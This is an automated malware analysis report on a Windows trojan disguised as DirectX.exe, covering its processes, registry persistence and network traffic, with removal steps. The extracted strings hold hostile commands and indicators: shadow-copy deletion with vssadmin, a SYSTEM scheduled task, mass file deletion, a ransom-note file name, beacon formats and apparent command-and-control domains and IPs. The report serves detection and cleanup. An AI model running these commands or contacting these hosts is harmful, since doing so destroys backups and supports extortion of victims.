MD5: 0648ee5d230adef499107434a4f62525
SHA1: d48eb459b061d4420295891c2f30822a5f13d4fc
SHA256: 37450cf9a93b6e06f9bf10252cd66a3f0604d3be1a4cc48a9b3105070fae1181
SSDeep: 3072:wjcprkEusAuRz9rKslr3GEqACD1Ryy0JeKELJZd:S9SXrJ2EDo1Ryy0cKMZd
Size: 208896 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-12-18 16:31:21
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

DirectX.exe:1460
%original file name%.exe:1504
%original file name%.exe:580
taskkill.exe:1296

The Trojan injects its code into the following process(es):

DirectX.exe:1416

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\DirectX.exe (1281 bytes)

Registry activity

The process DirectX.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process DirectX.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B C5 CC 14 9C D9 62 CC F5 B4 93 4F A1 AE E8 93"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DirectX" = "%WinDir%\DirectX.exe"

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 C7 3E AB AF 06 FA 23 22 8B B8 CD 52 32 97 A8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"Directx.exe" = "d"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process taskkill.exe:1296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 00 B8 E7 FF E6 DD 27 B8 28 A9 DE 86 84 E5 4F"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: d
Product Version: 1, 0, 0, 1
Legal Copyright: (C) 2011
Legal Trademarks:
Original Filename: d.exe
Internal Name: d
File Version: 1, 0, 0, 1
File Description: d
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://checkip.dyndns.com/
hxxp://checkip.dyndns.org/	216.146.38.70

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY DynDNS CheckIp External IP Address Server Response

Traffic

GET / HTTP/1.1

Host: checkip.dyndns.org

Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK

Content-Type: text/html

Server: DynDNS-CheckIP/1.0

Connection: close

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 106
<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: 194.242.96.218</body>&
lt;/html>....

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rdata

@.bss

.idata

.rsrc

piratedreed.com

domains.php

API.php

mask.php

194.242.96.218

%s%s.RDM

%s*.*

%s%s\

%s%c%c%c%c%c%c

%d.%d.%d

Software\Microsoft\Windows\CurrentVersion\Run

%s\system32\wbem\wmic.exe

process call create "cmd.exe /c schtasks /create /tn MONITOR1 /tr %s /sc ONSTART /ru SYSTEM"

process call create "cmd.exe /c vssadmin delete shadows /all /quiet"

%sX

Software\Microsoft\%s

taskkill /f /im %s

del %s /s /q

del %s

aaa.bat

103.25.202.192

92.222.80.28

78.138.97.93

POST /%s HTTP/1.1

Host: %s

Content-Type: application/x-www-form-urlencoded

GET /%s HTTP/1.1

%s\%s

advapi32.dll

process call create "cmd /c start %s"

id=%s&apt=%i&os=%s&ip=%s&bits=%s&discs=%s&pub=

%s&prv=

id=%s&s=%i

%s\DirectX.exe

%s\directx.exe

id=%s&ip=%s

hXXp://%s/ld/?id=%s

URL=hXXp://%s/ld/?id=%s

YOUR_FILES.url

checkip.dyndns.org

%s:%u: failed assertion `%s'

CryptExportKey

CryptGenKey

CryptImportKey

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

GetWindowsDirectoryA

WinExec

ShellExecuteA

GetKeyboardType

ADVAPI32.DLL

DNSAPI.DLL

WS2_32.DLL

KERNEL32.dll

msvcrt.dll

SHELL32.DLL

USER32.dll

directx.exe

DirectX.exe_1416_rwx_00300000_00100000:

.text

DirectX.exe_1416_rwx_00400000_00834000:

.text

`.data

.rdata

@.bss

.idata

.rsrc

piratedreed.com

domains.php

API.php

mask.php

194.242.96.218

%s%s.RDM

%s*.*

%s%s\

%s%c%c%c%c%c%c

%d.%d.%d

Software\Microsoft\Windows\CurrentVersion\Run

%s\system32\wbem\wmic.exe

process call create "cmd.exe /c schtasks /create /tn MONITOR1 /tr %s /sc ONSTART /ru SYSTEM"

process call create "cmd.exe /c vssadmin delete shadows /all /quiet"

%sX

Software\Microsoft\%s

taskkill /f /im %s

del %s /s /q

del %s

aaa.bat

103.25.202.192

92.222.80.28

78.138.97.93

POST /%s HTTP/1.1

Host: %s

Content-Type: application/x-www-form-urlencoded

GET /%s HTTP/1.1

%s\%s

advapi32.dll

process call create "cmd /c start %s"

id=%s&apt=%i&os=%s&ip=%s&bits=%s&discs=%s&pub=

%s&prv=

id=%s&s=%i

%s\DirectX.exe

%s\directx.exe

id=%s&ip=%s

hXXp://%s/ld/?id=%s

URL=hXXp://%s/ld/?id=%s

YOUR_FILES.url

checkip.dyndns.org

%s:%u: failed assertion `%s'

CryptExportKey

CryptGenKey

CryptImportKey

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

GetWindowsDirectoryA

WinExec

ShellExecuteA

GetKeyboardType

ADVAPI32.DLL

DNSAPI.DLL

WS2_32.DLL

KERNEL32.dll

msvcrt.dll

SHELL32.DLL

USER32.dll

127.0.0.1

directx.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   DirectX.exe:1460
   %original file name%.exe:1504
   %original file name%.exe:580
   taskkill.exe:1296

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\DirectX.exe (1281 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "DirectX" = "%WinDir%\DirectX.exe"
   
   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "DirectX" = "%WinDir%\DirectX.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.